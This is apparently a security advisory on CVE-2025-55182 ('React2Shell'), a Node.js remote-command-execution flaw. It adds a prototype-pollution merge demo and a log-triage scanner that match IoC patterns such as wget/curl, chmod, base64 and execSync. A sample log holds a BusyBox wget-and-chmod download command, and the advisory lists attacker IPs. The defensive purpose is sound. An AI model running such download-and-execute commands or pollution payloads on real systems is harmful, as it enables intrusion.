Full Report
Shortly after details of CVE-2025-55182 became public, we began noticing large volumes of exploitation attempts across our endpoint and network sensors. The vulnerability, informally referred to as React2Shell, affects Node.js applications that allow user-supplied JSON data to influence internal JavaScript object structures. When that data is not properly validated, an attacker can escalate the flaw into remote command execution by reaching `process.mainModule.require` and, through it, `child_process.execSync`.
Analysis Summary
# Vulnerability: React2Shell - Remote Code Execution in Node.js Applications
## CVE Details
- CVE ID: CVE-2025-55182
- CVSS Score: Not explicitly provided, but implied High severity due to RCE.
- CWE: Likely Prototype Pollution or Improper Input Validation leading to Injection (CWE-20/CWE-944 - Awaiting official CWE assignment)
## Affected Systems
- Products: Node.js applications that process user-supplied JSON data without proper validation.
- Versions: Any version exhibiting this specific improper validation pattern involving JSON influencing internal JavaScript object structures.
- Configurations: Applications that expose endpoints accepting user-supplied JSON input that is then used to manipulate internal objects, allowing access to `process.mainModule.require`.
## Vulnerability Description
This vulnerability, informally named "React2Shell," resides in Node.js applications where user-supplied JSON data is poorly validated, allowing attackers to manipulate internal JavaScript object structures (likely via Prototype Pollution or deserialization flaws). Successful exploitation grants the attacker access to `process.mainModule.require`, which can then be leveraged to call `child_process.execSync`, resulting in unauthenticated Remote Command Execution (RCE).
## Exploitation
- Status: Exploited in the wild (large volumes of exploitation attempts were observed across endpoint and network sensors shortly after disclosure).
- Complexity: Low (Described as simple to weaponize, affecting a large class of applications).
- Attack Vector: Network (Exploitation occurs via web requests containing malicious JSON).
## Impact
- Confidentiality: High (Allows code execution, leading to data theft).
- Integrity: High (Allows arbitrary command execution and system compromise).
- Availability: High (Used to deploy malware/miners, potentially leading to service disruption).
## Remediation
### Patches
- No specific vendor patches (e.g., specific Node.js versions or framework updates) are listed in this context. **Developer action is required** to fix the JSON parsing and validation logic in their specific applications.
### Workarounds
1. **Input Validation:** Immediately review and implement strict validation on all user-supplied JSON data to prevent structural manipulation (e.g., prototype pollution).
2. **Network Segmentation:** Reduce exposure by placing vulnerable services behind firewalls or in segmented networks.
3. **Disable Remote Access:** Disable unnecessary remote access capabilities on interconnected devices.
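As an added example (not code from the advisory or from any affected project), the following shows the merge pattern the vulnerability description refers to, a recursive merge of user-supplied JSON into an internal object, beside a hardened version that implements the input-validation workaround: the payload is checked for keys that reach the prototype chain before anything is written. The settings object and the payload are constructed for illustration.

```javascript
// Added example, not code from the advisory or any affected project.
// Keys that can redirect a write onto the prototype chain.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable: recurses on every key it finds. For a key named "__proto__",
// target[key] resolves to Object.prototype, so the nested values land there
// and every object in the process inherits them (prototype pollution).
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Walk the parsed JSON first and refuse any blocked key, so a rejected
// payload never partially modifies application state.
function assertNoPrototypeKeys(value, path = '$') {
  if (value === null || typeof value !== 'object') return;
  for (const key of Object.keys(value)) {
    if (BLOCKED_KEYS.has(key)) {
      throw new Error(`rejected key "${key}" at ${path} in user-supplied JSON`);
    }
    assertNoPrototypeKeys(value[key], `${path}.${key}`);
  }
}

// Hardened: validate the whole payload, then merge using own-property checks
// so inherited properties on the target are never treated as merge targets.
function safeMerge(target, source) {
  assertNoPrototypeKeys(source);
  for (const key of Object.keys(source)) {
    const value = source[key];
    const own = Object.prototype.hasOwnProperty.call(target, key);
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (!own || typeof target[key] !== 'object' || target[key] === null) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed payload of the shape the advisory warns about.
const CONSTRUCTED_PAYLOAD = '{"theme":"dark","__proto__":{"polluted":"yes"}}';

// Returns what an unrelated, freshly created object "sees" after the unsafe merge.
function runUnsafe() {
  const settings = { theme: 'light' };
  unsafeMerge(settings, JSON.parse(CONSTRUCTED_PAYLOAD));
  const leaked = ({}).polluted;        // 'yes': the write reached Object.prototype
  delete Object.prototype.polluted;    // undo the damage so the demo is repeatable
  return leaked;
}

// Returns whether the hardened merge rejected the payload and what state survived.
function runSafe() {
  const settings = { theme: 'light' };
  try {
    safeMerge(settings, JSON.parse(CONSTRUCTED_PAYLOAD));
    return { rejected: false, theme: settings.theme, leaked: ({}).polluted };
  } catch (err) {
    return { rejected: true, theme: settings.theme, leaked: ({}).polluted, reason: err.message };
  }
}

console.log('unsafe merge leaked:', runUnsafe());
console.log('safe merge result:', runSafe());
```

Validating before merging matters: a merge that throws on the offending key halfway through has already applied the earlier keys, which is the kind of partial state that makes incidents hard to reason about afterwards. Rejecting the three blocked keys is the minimum; allowlisting the expected top-level keys of each endpoint's schema is the stronger form of the same workaround.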
## Detection
- Indicators of Compromise (IoCs):
  - Execution of `BusyBox` commands.
  - Use of `wget` or `curl` for file download attempts in web application contexts.
  - Use of `chmod` to modify permissions shortly after exploitation.
  - Discovery of traffic involving base64 decoding sequences aimed at evading filters.
  - Payloads attempting to retrieve components from IP addresses like `193.34.213[.]150` or `41.231.37[.]153`.
- Detection Methods and Tools: Monitor endpoint and network sensors for command injection signatures matching payload patterns (e.g., calls to `child_process.execSync` derived from HTTP requests) or the specific command strings seen in dropped malware (`rondo.aqu.sh` or Mirai loaders).
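As an added example (not code from the advisory or from Bitdefender), the following triage pass runs the indicators listed above over constructed log lines: the post-exploitation tooling (BusyBox, `wget`/`curl` fetches, `chmod`, base64 decoding), `child_process.execSync` appearing in application output, and the two IP addresses the advisory names. The log format, timestamps, the TEST-NET address `198.51.100.7` and the scoring thresholds are assumptions made for the example.

```javascript
// Added example, not code from the advisory. Log lines below are constructed.
// Each indicator mirrors one IoC from the advisory; execSync reached from a
// request handler is a stronger signal on its own, so it carries more weight.
const INDICATORS = [
  { name: 'busybox',       weight: 1, re: /\bbusybox\b/i },
  { name: 'download-tool', weight: 1, re: /\b(?:wget|curl)\b[^"'\n]*(?:https?|ftp):\/\//i },
  { name: 'chmod',         weight: 1, re: /\bchmod\s+(?:[+-][rwx]+|[0-7]{3,4})\b/ },
  { name: 'base64-decode', weight: 1, re: /\bbase64\s+(?:-d|--decode)\b/ },
  { name: 'node-exec',     weight: 2, re: /process\.mainModule\.require|child_process\b.*\bexecSync|\bexecSync\(/ },
];

// The advisory's IP indicators, kept defanged as published and refanged here
// into anchored patterns so "41.231.37.153" does not match inside a longer IP.
const WATCHLIST = ['193.34.213[.]150', '41.231.37[.]153'].map((defanged) => {
  const ip = defanged.replace(/\[\.\]/g, '.');
  return { ip, re: new RegExp(`(?<![\\d.])${ip.replace(/\./g, '\\.')}(?![\\d.])`) };
});

// Score one line. A single tool name (a curl user-agent, a chmod in a build
// log) is noise; two indicators together, or any watchlisted IP, is worth a look.
function triageLine(line) {
  const matched = INDICATORS.filter((i) => i.re.test(line));
  const hits = matched.map((i) => i.name);
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  const ips = WATCHLIST.filter((w) => w.re.test(line)).map((w) => w.ip);
  let severity = 'none';
  if (ips.length > 0) severity = 'high';
  else if (score >= 2) severity = 'medium';
  else if (score === 1) severity = 'low';
  return { hits, ips, score, severity };
}

// Return only the lines that scored, with their 1-based line numbers.
function scanLog(lines) {
  return lines
    .map((line, idx) => ({ lineNo: idx + 1, ...triageLine(line) }))
    .filter((r) => r.severity !== 'none');
}

// Constructed sample: a web access log and an application log interleaved.
const SAMPLE_LOG = [
  '2025-12-05T10:01:02Z web POST /api/profile 200 body={"theme":"dark"}',
  '2025-12-05T10:01:09Z web GET /docs 200 ua="curl/8.5.0"',
  '2025-12-05T10:02:33Z web POST /api/profile 500 body={"cmd":"busybox wget http://198.51.100.7/b.sh; chmod +x b.sh"}',
  '2025-12-05T10:02:34Z app Error: spawnSync /bin/sh ENOENT at child_process.execSync (node:child_process) at handler (/srv/app/api.js:42)',
  '2025-12-05T10:02:40Z web POST /api/profile 500 body={"q":"echo aGVsbG8= | base64 -d"}',
  '2025-12-05T10:03:01Z web GET /update 404 referer="http://193.34.213.150/x"',
];

for (const alert of scanLog(SAMPLE_LOG)) {
  console.log(`line ${alert.lineNo}: ${alert.severity} hits=${alert.hits.join(',')} ips=${alert.ips.join(',')}`);
}
```

The benign `curl/8.5.0` user-agent on the second line scores nothing because the download-tool pattern requires a URL after the tool name; tuning that kind of boundary is what keeps the wget/curl indicator usable on a busy web log. In production the watchlist would be loaded from a threat-intelligence feed rather than hard-coded.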
## References
- Vendor Advisories: Deep-dive blog post available at `hxxp://www.bitdefender.com/en-us/blog/businessinsights/advisory-react2shell-critical-unauthenticated-rce-in-react-cve-2025-55182`
- Relevant Links:
  - General Information: `hxxp://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home`